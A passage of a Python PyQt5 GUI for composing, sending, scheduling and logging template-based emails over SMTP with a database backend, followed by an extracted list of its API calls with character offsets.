self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7) self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7) self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1) self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7) self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7) self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2) def display_logs(self): 
self.data_temp_logs = [] self.tbw_logs.setRowCount(0) self.clear_layout(self.right_layout) self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8) self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1) self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2) self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3) self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2) try: db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database() self.data_logs = db.get_logs() self.data_temp_logs = deepcopy(self.data_logs) if self.data_logs: row_num = len(self.data_logs) col_num = len(self.data_logs[0]) col_lst = list(self.data_logs[0].keys()) self.cmb_logs_choice.clear() self.cmb_logs_choice.addItems(col_lst) self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents) self.tbw_logs.setHorizontalHeaderLabels(col_lst) for i in range(row_num): row_data = list(self.data_logs[i].values()) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(i, j, item) except: QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok) else: db.__disconnect__() def get_items_from_layout(self, layout): return [layout.itemAt(i).widget() for i in range(layout.count())] def save_data(self, data): items = self.get_items_from_layout(self.right_layout) data.clear() try: for item in items: if type(item) == type(QLineEdit()): data.append(item.text()) elif type(item) == type(QCheckBox()): data.append(item.isChecked()) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) print(data) def clear_layout(self, layout): for i in reversed(range(layout.count())): layout.itemAt(i).widget().setParent(None) def open_eml(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") obj.setText(file_name) def open_excel(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)") obj.setText(file_name) def open_word(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)") obj.setText(file_name) def open_annex(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)") org_files = obj.text() all_files = org_files + ',' + file_name if org_files else file_name obj.setText(all_files) def print_html(self, index): if index: self.in_edit_web.setHtml(self.in_edit_html.toPlainText()) def send_mail(self): eml_type = self.in_eml_type.text() eml_file = self.in_eml_template.text() user_group = self.in_recipient_group.text() mail_excel = self.in_recipient_excel.text() annex_file = self.in_annex_file.text() url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com' try: if self.cb_scheduler.isChecked(): my_time = self.in_scheduler.text()+':00' client = Client() client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time) QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok) else: sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp() db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database() 
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url) sm.close() db.__disconnect__() QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def show_sub_win(self): if self.data_smtp: self.sub_win = SubWindow() self.sub_win.btn_send.clicked.connect(self.send_test) self.sub_win.show() else: QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok) def send_test(self): try: if self.data_smtp: mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5]) error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text()) mailserver.close() if error: QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok) else: QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) self.sub_win.in_recipient.clear() except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def eml_open(self): self.in_edit_html.clear() file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") if not file_name: return header, html = gm.get_msg(file_name) self.in_edit_sender.setText(header[2]) self.in_edit_sender_name.setText(header[1]) self.in_edit_subject.setText(header[0]) self.in_edit_html.insertPlainText(html) def eml_save(self): header, msg = [], '' header.append(self.in_edit_subject.text()) header.append(self.in_edit_sender_name.text()) header.append(self.in_edit_sender.text()) header.append('<EMAIL>') annex_file = self.in_edit_annex.text().split(',') html = self.in_edit_html.toPlainText() if not any(header[:3]) or not html: return try: msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html) file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)') with open(file_path, 'w') as outfile: gen = generator.Generator(outfile) gen.flatten(msg) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) def eml_reset(self): items = self.get_items_from_layout(self.right_layout) for item in items: if type(item) == type(QLineEdit()): item.clear() self.cb_edit_annex.setChecked(False) self.in_edit_html.clear() def logs_change(self): if not self.data_logs or not self.in_logs_data.text(): return self.data_temp_logs = [] self.tbw_logs.setRowCount(0) # header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'} condition = self.cmb_logs_choice.currentText() content = self.in_logs_data.text() row_num = len(self.data_logs) col_num = len(self.data_logs[0]) # self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) for i in range(row_num): switch = False if condition == 'date' and content in str(self.data_logs[i][condition]): switch = True elif self.data_logs[i][condition] == content: switch = True if switch: self.tbw_logs.insertRow(self.tbw_logs.rowCount()) row_data = list(self.data_logs[i].values()) self.data_temp_logs.append(self.data_logs[i]) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item) def logs_download(self): if self.data_temp_logs: try: file_path, _ = QFileDialog.getSaveFileName(self, 
'另存為...', './', 'Excel Files (*.xlsx)') if not file_path: return df = DataFrame(self.data_temp_logs) df.to_excel(file_path, index=False) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) else: QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok) def quit_act(self): # sender 是发送信号的对象 sender = self.sender() print(sender.text() + '键被按下') qApp = QApplication.instance() qApp.quit() def main(): app = QApplication(sys.argv) gui = MailserverUi() gui.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
[ "PyQt5.QtGui.QColor", "PyQt5.QtWidgets.QApplication", "copy.deepcopy", "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "PyQt5.QtWidgets.QTableWidget", "PyQt5.QtWidgets.QTextEdit", "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "email.generator.Generator", "PyQt5.QtWidgets.QComboBox", "PyQt5.QtCore.QDateTime.currentDateTime", "qdarkstyle.load_stylesheet_pyqt5", "GenAndSendMail.insert_send_mail", "PyQt5.QtWidgets.QLabel", "pandas.DataFrame", "PyQt5.QtWidgets.QPushButton", "PyQt5.QtWidgets.QLineEdit", "PyQt5.QtWidgets.QWidget", "PyQt5.QtWidgets.QApplication.instance", "mylibrary.genmail.get_msg", "PyQt5.QtWebEngineWidgets.QWebEngineView", "PyQt5.QtWidgets.QMessageBox.information", "pyqtgraph.setConfigOptions", "PyQt5.QtWidgets.QGridLayout", "server.sendmail.Smtp", "server.client.Client", "PyQt5.QtWidgets.QTabWidget", "PyQt5.QtWidgets.QCheckBox", "mylibrary.genmail.gen_eml", "pyqtgraph.GraphicsLayoutWidget", "pyqtgraph.setConfigOption", "server.database.Database", "PyQt5.QtWidgets.QMessageBox.warning" ]
[((22731, 22753), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (22743, 22753), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((986, 999), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (997, 999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1196, 1207), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (1205, 1207), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1298, 1315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""寄送"""'], {}), "('寄送')\n", (1309, 1315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1472, 1512), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""background"""', '"""#19232D"""'], {}), "('background', '#19232D')\n", (1487, 1512), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1521, 1555), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""foreground"""', '"""d"""'], {}), "('foreground', 'd')\n", (1536, 1555), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1564, 1596), 'pyqtgraph.setConfigOptions', 'setConfigOptions', ([], {'antialias': '(True)'}), '(antialias=True)\n', (1580, 1596), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((2553, 2562), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2560, 2562), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2613, 2626), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2624, 2626), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2754, 2763), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2761, 2763), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2847, 2860), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2858, 2860), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2961, 2970), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2968, 
2970), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3056, 3069), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (3067, 3069), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3432, 3451), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""發送信件"""'], {}), "('發送信件')\n", (3443, 3451), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3542, 3561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""系統設定"""'], {}), "('系統設定')\n", (3553, 3561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3649, 3669), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""資料庫設定"""'], {}), "('資料庫設定')\n", (3660, 3669), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3761, 3780), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""修改樣板"""'], {}), "('修改樣板')\n", (3772, 3780), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3878, 3901), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""\x08觸發明細"""'], {}), "('\\x08觸發明細')\n", (3889, 3901), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3993, 4014), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""下載觸發明細"""'], {}), "('下載觸發明細')\n", (4004, 4014), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4106, 4123), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""退出"""'], {}), "('退出')\n", (4117, 4123), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4674, 4685), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4683, 4685), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4841, 4855), 'PyQt5.QtWidgets.QTableWidget', 
'QTableWidget', ([], {}), '()\n', (4853, 4855), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5013, 5035), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ([], {}), '()\n', (5033, 5035), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((5158, 5169), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5167, 5169), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5201, 5212), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5210, 5212), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5243, 5260), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5254, 5260), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5384, 5395), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5393, 5395), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5430, 5441), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5439, 5441), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5478, 5495), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5489, 5495), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5625, 5636), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5634, 5636), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5667, 5684), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5678, 5684), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5984, 5999), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (5993, 5999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, 
QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6034, 6051), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (6045, 6051), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6166, 6177), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6175, 6177), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6206, 6217), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6215, 6217), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6246, 6257), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6255, 6257), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6290, 6301), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6299, 6301), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6329, 6344), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (6338, 6344), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6373, 6384), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6382, 6384), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6414, 6431), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6425, 6431), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6544, 6561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""測試"""'], {}), "('測試')\n", (6555, 6561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6670, 6681), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6679, 6681), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, 
QHeaderView\n'), ((6708, 6719), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6717, 6719), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6746, 6757), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6755, 6757), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6788, 6799), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6797, 6799), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6830, 6841), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6839, 6841), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6870, 6881), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6879, 6881), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6969, 6986), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6980, 6986), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7124, 7135), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7133, 7135), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7171, 7182), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7180, 7182), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7212, 7226), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""是"""'], {}), "('是')\n", (7221, 7226), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7256, 7267), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7265, 7267), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7298, 7315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", 
